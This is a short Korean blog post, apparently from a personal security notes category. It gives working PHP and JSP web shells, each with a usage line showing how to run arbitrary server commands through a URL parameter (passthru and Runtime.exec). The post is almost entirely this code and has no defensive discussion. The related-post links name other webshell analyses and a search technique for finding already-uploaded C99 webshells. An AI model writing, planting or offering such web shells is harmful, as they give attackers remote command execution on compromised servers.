티스토리 뷰
/* PHP Version URL CMD WebShell */
/* 사용법 : hxxp://URL/cmd.php?cmd=명령어 */
<?
echo "
<FORM ACTION=$PHP_SELF METHOD=POST>
CMD : <INPUT TYPE=TEXT NAME=command SIZE=40>
<INPUT TYPE=SUBMIT VALUE='Enter'></FORM>
<HR>n<XMP>n$resultn</XMP><HR>";
$command = str_replace("\", "", $command);
echo "<XMP>"; passthru($command); echo "</XMP>";
?>
/* JSP Version URL CMD WebShell */
/* 사용법 : hxxp://URL/cmd.jsp?cmd=명령어 */
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
'기억하자정보 > 보안' 카테고리의 다른 글
| 그누보드 업로드 취약점 (0) | 2016.08.23 |
|---|---|
| Maceo's cmd.asp 코드분석 (ASP WebShell) (0) | 2014.11.04 |
| array_diff_ukey() 함수를 이용한 PHP WebShell (0) | 2014.11.04 |
| 이미 업로드 된 C99 WebShell 찾는 Google 검색법 (0) | 2014.11.04 |
| PHP WebShell(jahat.php) 파일 분석 (0) | 2014.11.04 |
- 안내
- 궁금한 점을 댓글로 남겨주시면 답변해 드립니다.
